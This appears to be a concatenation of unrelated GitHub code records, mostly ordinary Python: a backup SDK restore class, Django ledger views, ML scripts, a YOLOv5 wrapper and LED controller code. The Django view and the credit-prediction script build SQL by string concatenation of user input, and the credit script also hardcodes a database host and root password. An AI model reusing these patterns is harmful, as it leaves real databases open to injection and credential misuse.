response is empty\n\n if response is not success\n\n \"\"\"\n if not (isinstance(path, list) and\n isinstance(overwrite, bool)):\n raise SDKException('Instance', '101')\n\n if path == []:\n raise SDKException('Instance', '104')\n\n if dest_client_name is None:\n dest_client_name = self._agent_object._client_object.client_name\n\n if dest_instance_name is None:\n dest_instance_name = self.instance_name\n\n request_json = self._restore_json(\n paths=path,\n staging=staging,\n dest_client_name=dest_client_name,\n dest_instance_name=dest_instance_name,\n data_restore=data_restore,\n log_restore=log_restore,\n overwrite=overwrite,\n copy_precedence=copy_precedence,\n from_time=from_time,\n to_time=to_time,\n media_agent=media_agent,\n table_level_restore=table_level_restore,\n clone_env=clone_env,\n clone_options=clone_options,\n redirect_enabled=redirect_enabled,\n redirect_path=redirect_path,\n browse_jobid=browse_jobid)\n\n return self._process_restore_response(request_json)\n\n def _restore_browse_option_json(self, value):\n \"\"\"setter for the Browse options for restore in Json\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n super(MYSQLInstance, self)._restore_browse_option_json(value)\n self._browse_restore_json['backupset'] = {\n \"clientName\": self._agent_object._client_object.client_name,\n \"backupsetName\": \"defaultDummyBackupSet\"\n }\n\n if value.get(\"browse_jobid\"):\n self._browse_restore_json['browseJobId'] = value.get(\"browse_jobid\")\n\n if value.get(\"from_time\") and value.get(\"to_time\"):\n self._browse_restore_json[\"timeRange\"] = {\"fromTime\" : value.get(\"from_time\"),\n \"toTime\" : value.get(\"to_time\")}\n\n def _restore_common_options_json(self, value):\n \"\"\"setter for the Common options in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._commonoption_restore_json = {\n \"restoreToDisk\": False,\n \"onePassRestore\": False,\n \"revert\": False,\n \"syncRestore\": False\n }\n\n def _restore_destination_json(self, value):\n \"\"\"setter for the MySQL Destination options in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._destination_restore_json = {\n \"destinationInstance\": {\n \"clientName\": value.get(\"dest_client_name\", \"\"),\n \"instanceName\": value.get(\"dest_instance_name\", \"\"),\n \"appName\": \"MySQL\"\n },\n 
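# --- Illustrative aside (not part of the record): the core of the mySqlRstOption block
# assembled by _restore_mysql_option_json a bit further below, built standalone. Keys are
# a subset chosen for illustration; values are made up.
def mysql_restore_options(staging, to_time=None, table_level=False):
    opts = {
        "data": True,
        "log": True,
        "temporaryStagingLocation": staging,
        "tableLevelRestore": table_level,
        "pointofTime": bool(to_time),
    }
    if to_time:
        opts["pointInTime"] = {"time": to_time}
    return opts

print(mysql_restore_options("/tmp/staging", to_time="2020-01-01 00:00:00"))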
\"destClient\": {\n \"clientName\": value.get(\"dest_client_name\", \"\")\n }\n }\n\n def _restore_fileoption_json(self, value):\n \"\"\"setter for the fileoption restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self._fileoption_restore_json = {\n \"sourceItem\": value.get(\"paths\", [])\n }\n\n def _restore_admin_option_json(self, value):\n \"\"\"setter for the admin restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self.admin_option_json = {\n \"contentIndexingOption\": {\n \"subClientBasedAnalytics\": False\n }\n }\n\n def _restore_mysql_option_json(self, value):\n \"\"\"setter for the mysql restore option in restore JSON\"\"\"\n\n if not isinstance(value, dict):\n raise SDKException('Instance', '101')\n\n self.mysql_restore_json = {\n \"destinationFolder\": \"\",\n \"data\": value.get(\"data_restore\", True),\n \"log\": value.get(\"log_restore\", True),\n \"recurringRestore\": False,\n \"temporaryStagingLocation\": value.get(\"staging\", \"\"),\n \"dataStagingLocation\": \"\",\n \"logRestoreType\": 0,\n \"tableLevelRestore\": value.get(\"table_level_restore\", False),\n \"pointofTime\": True if value.get(\"to_time\") else False,\n \"instanceRestore\": True,\n \"isCloneRestore\": value.get(\"clone_env\", False),\n \"fromTime\": value.get(\"from_time\", {}),\n \"refTime\": value.get(\"to_time\", {}),\n \"destinationServer\": {\n \"name\": \"\"\n }\n }\n if value.get(\"table_level_restore\"):\n self.mysql_restore_json['dropTable'] = True\n self.mysql_restore_json['instanceRestore'] = False\n\n if value.get(\"clone_env\", False):\n self.mysql_restore_json[\"cloneOptions\"] = value.get(\"clone_options\", \"\")\n\n if value.get(\"redirect_path\"):\n self.mysql_restore_json[\"redirectEnabled\"] = True\n self.mysql_restore_json[\"redirectItems\"] = [value.get(\"redirect_path\")]\n\n if value.get(\"from_time\"):\n self.mysql_restore_json[\"fromTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"to_time\"):\n self.mysql_restore_json[\"refTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"to_time\"):\n self.mysql_restore_json[\"pointInTime\"] = {\"time\" : value.get(\"to_time\")}\n\n if value.get(\"dest_instance_name\"):\n self.mysql_restore_json[\"destinationServer\"] = {\"name\": value.get(\n \"dest_instance_name\")}\n","repo_name":"Commvault/cvpysdk","sub_path":"cvpysdk/instances/mysqlinstance.py","file_name":"mysqlinstance.py","file_ext":"py","file_size_in_byte":20037,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"1997215190","text":"from django.shortcuts import render, redirect\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom django.contrib.auth.models import User\r\nfrom django.db import IntegrityError\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom .models import *\r\nfrom .forms import LedgerForm, DealerForm, RoadExpenseForm\r\nfrom .decorators import unauthenticated_user, allowed_users, admin_only\r\nfrom django.core.paginator import Paginator, EmptyPage\r\n\r\n# for current date displaying in netbal_pdf_view\r\nimport datetime\r\nfrom datetime import date, timedelta\r\n#for rendering pdf\r\nfrom django.http import HttpResponse\r\nfrom django.template.loader import get_template\r\nfrom xhtml2pdf import pisa\r\n#for image storage\r\nfrom django.core.files.storage 
import FileSystemStorage\r\n\r\n\r\n\r\n#function for rendering pdf of dealer report\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef netbal_pdf_view(request):\r\n template_path = 'ledger/netbalpdf.html'\r\n a = BrandNew.objects.all()\r\n size = len(a)\r\n today = date.today()\r\n d4 = today.strftime(\"%d-%b-%Y\")\r\n context = {'a':a,'size':size,'today':d4}\r\n # Create a Django response object, and specify content_type as pdf\r\n response = HttpResponse(content_type='application/pdf')\r\n #if direct download needed uncomment line below\r\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\r\n # find the template and render it.\r\n template = get_template(template_path)\r\n html = template.render(context)\r\n\r\n # create a pdf\r\n pisa_status = pisa.CreatePDF(\r\n html, dest=response)\r\n # if error then show some funy view\r\n if pisa_status.err:\r\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\r\n return response\r\n\r\n#function for rendering pdf of records in range of mentioned dates\r\n\r\n\r\ndef day_range_rec(request):\r\n if request.method == 'GET':\r\n return render(request,'ledger/dailytrans.html')\r\n\r\n else:\r\n template_path = 'ledger/day_range_rec.html'\r\n fromdate = request.POST.get('fromdate')\r\n todate = request.POST.get('todate')\r\n # To force selection of both the date fields\r\n if fromdate == \"\" or todate == \"\":\r\n context = {\"error\": \"Please select both the fields\"}\r\n return render(request,'ledger/dailytrans.html', context)\r\n\r\n # To ensure selected date range is valid\r\n today = date.today()\r\n d1 = today.strftime(\"%Y-%m-%d\")\r\n tomorrow = today + timedelta(1)\r\n d2 = tomorrow.strftime(\"%Y-%m-%d\")\r\n if fromdate>todate or fromdate>d1 or todate>d2:\r\n context = {\"error\": \"selected date range is invalid\"}\r\n return render(request,'ledger/dailytrans.html', context)\r\n\r\n ledgers = Ledger.objects.raw('select * from led where date between \"'+fromdate+'\" and \"'+todate+'\"')\r\n context = {'ledgers': ledgers, 'fromdate':fromdate, 'todate': todate}\r\n # Create a Django response object, and specify content_type as pdf\r\n response = HttpResponse(content_type='application/pdf')\r\n #if direct download needed uncomment line below\r\n #response['Content-Disposition'] = 'attachment; filename=\"report.pdf\"'\r\n response['Content-Disposition'] = 'filename=\"report.pdf\"'\r\n # find the template and render it.\r\n template = get_template(template_path)\r\n html = template.render(context)\r\n\r\n # create a pdf\r\n pisa_status = pisa.CreatePDF(\r\n html, dest=response)\r\n # if error then show some funy view\r\n if pisa_status.err:\r\n return HttpResponse('We had some errors
<pre>' + html + '</pre>
')\r\n return response\r\n\r\n\r\n#LEDGER\r\n@login_required(login_url='loginuser')\r\n@admin_only\r\ndef home(request):\r\n #this edit to solve the MultiValueDictKeyError\r\n query = request.POST.get('query', False)\r\n if query == \"\":\r\n return render(request, 'ledger/home.html')\r\n alldealers = Dealer.objects.filter(name__istartswith=query)\r\n context = {'alldealers':alldealers}\r\n return render(request, 'ledger/home.html', context)\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin', 'employee'])\r\ndef ledger(request, pk):\r\n dealer = Dealer.objects.get(id=pk)\r\n form = LedgerForm(initial={\"dealer\":dealer},instance=dealer)\r\n if request.method == 'GET':\r\n return render(request, 'ledger/ledger.html', {'form':form})\r\n else:\r\n form = LedgerForm(request.POST, request.FILES or None)\r\n\r\n if form.is_valid():\r\n form.save()\r\n # redirecting employee groups to their userpage and admins to the dealer page\r\n if request.user.groups.filter(name='admin'):\r\n return redirect('dealer', pk)\r\n else:\r\n return redirect('userpage')\r\n\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dealer(request, pk):\r\n dealer = Dealer.objects.get(id=pk)\r\n ledgers = dealer.ledger_set.all()\r\n orderedledger = ledgers.order_by('-date')\r\n\r\n #paginating\r\n p = Paginator(orderedledger, 10)\r\n page_num = request.GET.get('page', 1)\r\n try:\r\n page = p.page(page_num)\r\n except EmptyPage:\r\n page = p.page(1)\r\n\r\n context = {'dealer':dealer,'orderedledger':page,'pk':pk}\r\n return render(request, 'ledger/dealer.html', context)\r\n\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dealerform(request):\r\n if request.method == 'GET':\r\n return render(request, 'ledger/dealerform.html', {'form':DealerForm()})\r\n else:\r\n form = DealerForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('home')\r\n\r\n@login_required(login_url='loginuser')\r\ndef userpage(request):\r\n try :\r\n userobjects = ViewDealer.objects.get(user=request.user)\r\n dealerallowed = userobjects.dealer.all()\r\n except :\r\n context = {\"message\": \"No dealers allowed to view\"}\r\n return render(request, 'ledger/user.html', context)\r\n # list l is storing data of all allowed dealer and their ledgers\r\n l = []\r\n for d in dealerallowed:\r\n dict = {}\r\n dict[\"name\"] = d.name\r\n dict[\"address\"] = d.address\r\n dict[\"mobile\"] = d.mob_num\r\n dict['dealerid'] = d.id\r\n #leg list for storing ledgers of the current iterating dealer\r\n leg = []\r\n bn = BrandNew.objects.get(dealer = d.id)\r\n led_number = bn.ledger_number\r\n k = 0\r\n while(k!=30):\r\n try:\r\n led = Ledger.objects.get(dealer = d,dealer_ledger_number = led_number-k)\r\n leg.append(led)\r\n except:\r\n break\r\n k += 1\r\n dict[\"ledger\"] = leg\r\n l.append(dict)\r\n if len(dealerallowed) == 0:\r\n context = {\"message\": \"No dealers allowed to view\"}\r\n else:\r\n context = {\"ledgers\":l}\r\n return render(request, 'ledger/user.html', context)\r\n\r\ndef roadexpense(request):\r\n if request.method == 'GET':\r\n user = request.user\r\n form = RoadExpenseForm(initial={\"user\":user},instance=user)\r\n return render(request, 'ledger/expense.html', {'form':form})\r\n else:\r\n form = RoadExpenseForm(request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return redirect('home')\r\n\r\n\r\n\r\n# report to be converted into pdf from 
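# --- Illustrative aside (not part of the record): the Paginator fallback used in the
# dealer view above, standalone (assumes Django is installed; the list stands in for a
# queryset).
from django.core.paginator import Paginator, EmptyPage

items = list(range(35))
p = Paginator(items, 10)
try:
    page = p.page(99)                 # out-of-range page number
except EmptyPage:
    page = p.page(1)                  # fall back to the first page, as the view does
print(page.number, list(page.object_list))
# The raw SQL in day_range_rec earlier can likewise take placeholders instead of string
# concatenation, e.g.:
# Ledger.objects.raw('select * from led where date between %s and %s', [fromdate, todate])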
html\r\n@login_required(login_url='loginuser')\r\n@allowed_users(allowed_roles=['admin'])\r\ndef dailytrans(request):\r\n return render(request,'ledger/dailytrans.html')\r\n\r\n\r\n\r\n\r\n# AUTHENTICATION FUNCTIONS\r\n\r\n@unauthenticated_user\r\ndef loginuser(request):\r\n if request.method == 'POST':\r\n username=request.POST['username']\r\n password=request.POST['password']\r\n user = authenticate(username=request.POST['username'],password=request.POST['password'])\r\n if user is None:\r\n print(\"I'm In\")\r\n print(AuthenticationForm())\r\n return render(request, 'ledger/login.html', {'form':AuthenticationForm(), 'error': 'Username or Password did not match'})\r\n else:\r\n login(request, user)\r\n return redirect('home')\r\n else:\r\n return render(request, 'ledger/login.html', {'form':AuthenticationForm()})\r\n\r\n\r\ndef logoutuser(request):\r\n if request.method == 'POST':\r\n logout(request)\r\n return redirect('loginuser')\r\n\r\ndef cheque_alter(request,ledger_no,pk):\r\n dealer = Dealer.objects.get(id = pk)\r\n led = Ledger.objects.get(dealer_ledger_number = ledger_no,dealer = dealer.id)\r\n val = led.isChequeCleared\r\n led.isChequeCleared = not val\r\n led.save()\r\n return redirect('dealer',pk)\r\n","repo_name":"shlok1805/web-ledger","sub_path":"ledger/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33120719631","text":"\"\"\"\n===================\nCoregistration demo\n===================\n\nThis example shows a basic coregistration step from anatomical to mean\nfunctional.\n\"\"\"\n# Create a memory context\nfrom nipype.caching import Memory\nmem = Memory('/tmp')\n\n# Compute mean functional\nfrom procasl import preprocessing\naverage = mem.cache(preprocessing.Average)\nout_average = average(in_file='/tmp/func.nii')\nmean_func = out_average.outputs.mean_file\n\n# Coregister anat to mean functional\nfrom nipype.interfaces import spm\ncoregister = mem.cache(spm.Coregister)\nout_coregister = coregister(\n target=mean_func,\n source='/tmp/anat.nii',\n write_interp=3)\n\n# Check coregistration\nimport matplotlib.pylab as plt\nfrom nilearn import plotting\nfigure = plt.figure(figsize=(5, 4))\ndisplay = plotting.plot_anat(mean_func, figure=figure, display_mode='z',\n cut_coords=(-7, 32),\n title='anat edges on mean functional')\ndisplay.add_edges(out_coregister.outputs.coregistered_source)\nfigure.suptitle('Impact of tagging correction')\nplt.show()\n","repo_name":"salma1601/process-asl-old","sub_path":"examples/plot_heroes_coregister.py","file_name":"plot_heroes_coregister.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41395127175","text":"with open(\"input.txt\") as datafile:\r\n data = [line.strip() for line in datafile.readlines()]\r\n\r\netd = int(data[0])\r\nbuses = set(data[1].split(\",\"))\r\nbuses.remove(\"x\")\r\n\r\nminwait = etd\r\nmybus = 0\r\n\r\nfor bus in buses:\r\n if int(bus) - (etd % int(bus)) < minwait:\r\n minwait = int(bus) - etd % int(bus)\r\n mybus = int(bus)\r\n\r\nprint(minwait * mybus)","repo_name":"Trainpants/Advent","sub_path":"2020/Day13/Day13P1.py","file_name":"Day13P1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25880070757","text":"import threading\nimport time\ndef s1():\n print('start s1')\n 
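# --- Illustrative aside (not part of the records above): the minimum-wait search from the
# Advent of Code Day 13 solution, condensed with min() over (wait, bus) pairs; the numbers
# are the puzzle's published sample input.
etd = 939
buses = [7, 13, 59, 31, 19]
wait, bus = min(((b - etd % b) % b, b) for b in buses)
print(wait * bus)                     # -> 295 for the sample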
time.sleep(3.5)\n print('finish s1')\n\ndef s2():\n print('start s2')\n time.sleep(3)\n print('finish s2')\n\ndef main():\n print('start main')\n t1 = threading.Thread(target=s1)\n # 将t1设置为守护线程,注意,设置守护线程需要在开始线程之前\n t1.setDaemon(True)\n # 还可这样设置\n # ti.daemon = True\n t1.start()\n\n t2 = threading.Thread(target=s2)\n t2.start()\n\n print('finish main')\n\nif __name__ == '__main__':\n main()","repo_name":"kyle-liu007/PythonStudy","sub_path":"多线程/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18023861198","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn import datasets\nimport sys\nimport MySQLdb\n\ndb = MySQLdb.connect(host=\"ec2-52-37-241-124.us-west-2.compute.amazonaws.com\", # your host, usually localhost\n user=\"root\", # your username\n passwd=\"password\", # your password\n db=\"credit_data\") # name of the data base\n\n# you must create a Cursor object. It will let\n# you execute all the queries you need\ncur = db.cursor()\n\n# Use all the SQL you like\n\n\ntotal = len(sys.argv)\n\ncmdargs = str(sys.argv)\n\nmyprediction = list()\n\n#for i in range(1,total):\n # myprediction.append(int(sys.argv[i]))\n\nquery=\"INSERT INTO credit_predict (`Male` ,`Age` ,`Debt` ,`Married` ,`EducationLevel` ,`Ethnicity` ,`YearsEmployed` ,`PriorDefault` ,`Employed`,`CreditScore` ,`DriversLicense` ,`Citizen` ,`ZipCode` ,`Income` ,`Prediction` ) VALUES( \"\n\nfor i in range(1,total):\n\tmyprediction.append(int(sys.argv[i]))\n\tquery+=str(sys.argv[i])+\",\"\n#print(query+\");\")\n\ndata = pd.read_csv(\"Credit_clean.csv\",header = 0)\n\ndata_set = data[data.columns[0:14]]\n\ntarget_set = data[data.columns[14]]\n\ntarget = np.array(target_set).astype(int)\n\nclf = DecisionTreeClassifier()\n\nclf = clf.fit(data_set,target_set)\n\nX=myprediction\n\nY=np.array(X).reshape((1,-1))\n\npredict=clf.predict(Y)\n\nif(predict[len(predict)-1]==1):\n print(\"YES\")\nelse:\n print(\"NO\")\n\nquery+=str(predict[len(predict)-1])\nquery+=\");\"\n#print(query)\n\ncur.execute(query);\ndb.commit()\ndb.close()\n","repo_name":"knightswatch3/FinCal","sub_path":"scikitscripts/credit_approval_prediction.py","file_name":"credit_approval_prediction.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21152861210","text":"import struct,os\ndef getBFLIMSWIZZLE(fn):\n fp = open(fn , \"rb\")\n fp.seek(-5,2)\n SWIZZLE = ord(fp.read(1))\n SWIZZLE = (SWIZZLE - 4 )/ 0x20\n fp.close()\n return SWIZZLE\n\nos.system(\"AMDCompressCLI.exe -fd BC4 \\\"inPNG\\\\image__titlelogowindwakermask_00^s.bflim.gtx.dds.PNG\\\" \\\"inDDS\\\\image__titlelogowindwakermask_00^s.bflim.gtx.dds\\\"\")\n\n\n\nfl = os.listdir(\"inDDS\")\nfor fn in fl:\n print(fn.split(\".\")[0])\n SWIZZLE = getBFLIMSWIZZLE(fn.split(\".\")[0].replace(\"__\" , \"\\\\\") + \".bflim\")\n print(SWIZZLE)\n os.system(\"TexConv2.exe -i \\\"inDDS\\%s\\\" -o \\\"inGTX\\%s.gtx\\\" -swizzle %d\"%(fn ,fn.split(\".\")[0] , SWIZZLE))\n\n","repo_name":"wmltogether/BlackWaterUnpacker","sub_path":"BlackWaterUnpacker/image_tool/runDDS2GTX.py","file_name":"runDDS2GTX.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"21297123135","text":"from jax import numpy as 
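# --- Illustrative aside (not part of the records above): the swizzle decode performed by
# getBFLIMSWIZZLE, as bare arithmetic. On Python 3, floor division (//) keeps the result an
# integer for the later '-swizzle %d' format; the byte value below is made up.
swizzle_byte = 0x44                   # pretend this was read 5 bytes before EOF
swizzle = (swizzle_byte - 4) // 0x20
print(swizzle)                        # -> 2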
jnp\nimport numpy as np\nfrom jax import grad, jit \nimport time\n\nsigmoid = lambda x: 1 / (1+jnp.exp(-x))\nce_loss = lambda y_tgts, y_pred: -jnp.mean( y_tgts * jnp.log(y_pred)\\\n + (1-y_tgts) * jnp.log(1-y_pred))\n\ndef forward(x, w):\n\n x = jnp.tanh(jnp.matmul(x,w[0]))\n x = sigmoid(jnp.matmul(x,w[1]))\n\n return x\n\n@jit\ndef get_loss(x, w, y_tgts):\n\n y_pred = forward(x, w)\n\n return ce_loss(y_tgts, y_pred)\n\nget_grad = grad(get_loss, argnums=(1))\njit_grad = jit(get_grad)\n\nif __name__ == \"__main__\":\n\n x = np.random.randn(1024,128)\n y_tgts = np.random.randint(2, size=(1024,1))\n\n w0 = 1e-2 * np.random.randn(128,128)\n w1 = 1e-2 * np.random.randn(128,1)\n w = [w0,w1]\n\n t0 = time.time()\n for ii in range(10000):\n\n my_grad = get_grad(x,w, y_tgts)\n\n\n for idx, grads in enumerate(my_grad):\n w[idx] -= 1e-2 * grads\n\n if ii % 100 == 0:\n loss = get_loss(x, w, y_tgts)\n print(loss)\n\n t00 = time.time()\n\n w0 = 1e-2 * np.random.randn(128,128)\n w1 = 1e-2 * np.random.randn(128,1)\n w = [w0,w1]\n\n t1 = time.time()\n jit_get_loss = jit(get_loss)\n for jj in range(10000):\n\n my_grad = jit_grad(x, w, y_tgts)\n\n for idx, grads in enumerate(my_grad):\n w[idx] -= 1e-2 * grads\n\n if jj % 100 == 0:\n loss = get_loss(x, w, y_tgts)\n print(loss)\n\n\n t2 = time.time()\n\n print(\"loop execution time: {:.2f} s, time with jit: {:.2f} s\".format(t00-t0, t2-t1))\n\n","repo_name":"riveSunder/MLPDialects","sub_path":"jax_nn2.py","file_name":"jax_nn2.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"7002164456","text":"import numpy as np\r\nimport torch\r\nimport cv2\r\nfrom yolov5.models.experimental import attempt_load\r\nfrom yolov5.utils.augmentations import letterbox\r\nfrom yolov5.utils.general import check_img_size, non_max_suppression, scale_coords\r\nfrom yolov5.utils.torch_utils import select_device\r\n\r\n\r\nclass YOLOv5(object):\r\n # Parameter settings\r\n _defaults = {\r\n \"weights\": \"../yolov5s.pt\",\r\n \"imgsz\": 640,\r\n \"iou_thres\": 0.45,\r\n \"conf_thres\": 0.25,\r\n \"classes\": 0 # only detect the person class\r\n }\r\n\r\n @classmethod\r\n def get_defaults(cls, n):\r\n if n in cls._defaults:\r\n return cls._defaults[n]\r\n else:\r\n return \"Unrecognized attribute name '\" + n + \"'\"\r\n\r\n # Initialization: load the model\r\n def __init__(self, device='0', **kwargs):\r\n self.__dict__.update(self._defaults)\r\n self.device = select_device(device)\r\n self.half = self.device != \"cpu\"\r\n\r\n self.model = attempt_load(self.weights, map_location=self.device) # load FP32 model\r\n self.imgsz = check_img_size(self.imgsz, s=self.model.stride.max()) # check img_size\r\n if self.half:\r\n self.model.half() # to FP16\r\n\r\n # Inference\r\n def infer(self, inImg):\r\n # Use the letterbox method to resize the image to 640\r\n img = letterbox(inImg, new_shape=self.imgsz)[0]\r\n\r\n # Normalization and tensor conversion\r\n img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416\r\n img = np.ascontiguousarray(img)\r\n img = torch.from_numpy(img).to(self.device)\r\n img = img.half() if self.half else img.float() # uint8 to fp16/32\r\n img /= 255.0 # 0 - 255 to 0.0 - 1.0\r\n if img.ndimension() == 3:\r\n img = img.unsqueeze(0)\r\n\r\n # Run inference\r\n pred = self.model(img, augment=True)[0]\r\n # NMS\r\n pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, agnostic=True)\r\n\r\n bbox_xyxy = []\r\n confs = []\r\n cls_ids = []\r\n\r\n # Parse the detection results\r\n for i, det in enumerate(pred): # detections per image\r\n if det is not None and 
len(det):\r\n # Map the detection boxes back to the original image size\r\n det[:, :4] = scale_coords(img.shape[2:], det[:, :4], inImg.shape).round()\r\n # Save the results\r\n for *xyxy, conf, cls in reversed(det):\r\n bbox_xyxy.append(xyxy)\r\n confs.append(conf.item())\r\n cls_ids.append(int(cls.item()))\r\n\r\n xyxys = torch.Tensor(bbox_xyxy)\r\n confss = torch.Tensor(confs)\r\n cls_ids = torch.Tensor(cls_ids)\r\n\r\n return xyxys, confss, cls_ids\r\n\r\n\r\nif __name__ == '__main__':\r\n yolov5_obj = YOLOv5()\r\n im = cv2.imread(\"../../data/images/zidane.jpg\") # image: the extracted image value that is returned\r\n\r\n res = yolov5_obj.infer(im)\r\n print(res)\r\n","repo_name":"justinge/demo1","sub_path":"yolov5/utils/flask_rest_api/Yolov5.py","file_name":"Yolov5.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19809206128","text":"# (c) 2020 ARTEMES INTERNATIONAL, LLC.\n# WWW.MAISONARTEMES.COM\nimport board\nimport neopixel\nimport touchio\nimport adafruit_fancyled.adafruit_fancyled as fancy\nfrom adafruit_bluefruit_connect.packet import Packet\nfrom adafruit_bluefruit_connect.button_packet import ButtonPacket\nfrom adafruit_bluefruit_connect.color_packet import ColorPacket\nfrom adafruit_ble import BLERadio\nfrom adafruit_ble.advertising.standard import ProvideServicesAdvertisement\nfrom adafruit_ble.services.nordic import UARTService\n\nNUM_LEDS = 20 # number of ring LEDs\nRIGHT_PIN = board.A1 # wiring\nLEFT_PIN = board.A6\nCPX_PIN = board.D8 # CPX Neopixels D8\n\ntouch_A2 = touchio.TouchIn(board.A2)\ntouch_A3 = touchio.TouchIn(board.A3)\ntouch_A4 = touchio.TouchIn(board.A4)\ntouch_A5 = touchio.TouchIn(board.A5)\ntouch_TX = touchio.TouchIn(board.TX)\n\n# Online/Sync Mode\nPALETTE_ARTEMES = [fancy.CRGB(0.0, 0.3, 0.7), # Blue\n fancy.CRGB(0.0, 0.0, 1.0), # Blue\n fancy.CRGB(27, 20, 100)]\n # fancy.CRGB(95, 39, 205)] Purple\n\n# Torch Mode\nPALETTE_TORCH = [fancy.CRGB(255, 255, 255)] # White\n\n# Off Mode\nPALETTE_OFF = [fancy.CRGB(0, 0, 0)] # Black\n\n# Alert Mode\nPALETTE_ALERT = [fancy.CRGB(255, 0, 0), # Red\n fancy.CRGB(0, 0, 0),\n fancy.CRGB(234, 65, 0)] # Red\n\nright = neopixel.NeoPixel(RIGHT_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\nleft = neopixel.NeoPixel(LEFT_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\ncpx = neopixel.NeoPixel(CPX_PIN, NUM_LEDS, brightness=1.0, auto_write=False)\n\noffset = 0 # color spin\noffset_increment = 1\nOFFSET_MAX = 1000000\n\n# BLE\nble = BLERadio()\nuart = UARTService()\nadvertisement = ProvideServicesAdvertisement(uart)\n\ndef set_palette(palette):\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n right[i] = color.pack()\n right.show()\n\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n left[i] = color.pack()\n left.show()\n\n for i in range(NUM_LEDS):\n color = fancy.palette_lookup(palette, (offset + i) / NUM_LEDS)\n color = fancy.gamma_adjust(color, brightness=1.0)\n cpx[i] = color.pack()\n cpx.show()\n\n# palette on startup\npalette_choice = PALETTE_ARTEMES\n\n# palette cycling\ncycling = True\n\n# advertising?\nadvertising = False\n\nwhile True:\n\n if cycling:\n set_palette(palette_choice)\n offset = (offset + offset_increment) % OFFSET_MAX\n\n if not ble.connected and not advertising:\n ble.start_advertising(advertisement)\n advertising = True\n\n # connected via Bluetooth\n if ble.connected:\n advertising = 
False\n if uart.in_waiting:\n packet = Packet.from_stream(uart)\n if isinstance(packet, ColorPacket):\n cycling = False\n # Set all pixels to one color\n right.fill(packet.color)\n left.fill(packet.color)\n cpx.fill(packet.color)\n right.show()\n left.show()\n cpx.show()\n elif isinstance(packet, ButtonPacket):\n cycling = True\n if packet.pressed:\n if packet.button == ButtonPacket.BUTTON_1:\n palette_choice = PALETTE_OFF\n elif packet.button == ButtonPacket.BUTTON_2:\n palette_choice = PALETTE_TORCH\n elif packet.button == ButtonPacket.BUTTON_3:\n palette_choice = PALETTE_ALERT\n offset_increment = 6\n elif packet.button == ButtonPacket.BUTTON_4:\n palette_choice = PALETTE_ARTEMES\n offset_increment = 1\n\n # animation speed\n elif packet.button == ButtonPacket.UP:\n offset_increment += 1\n elif packet.button == ButtonPacket.DOWN:\n offset_increment -= 1\n\n if touch_A2.value:\n cycling = True\n palette_choice = PALETTE_OFF\n elif touch_A3.value:\n cycling = True\n palette_choice = PALETTE_TORCH\n elif touch_A4.value:\n cycling = True\n palette_choice = PALETTE_ALERT\n offset_increment = 6\n elif touch_A5.value:\n cycling = True\n palette_choice = PALETTE_ARTEMES\n offset_increment = 1\n","repo_name":"ArtemesIntl/ArtemesSyncNotifs","sub_path":"artemes_sync_notifs.py","file_name":"artemes_sync_notifs.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32444986082","text":"from rest_framework import serializers\n\nfrom api.models import 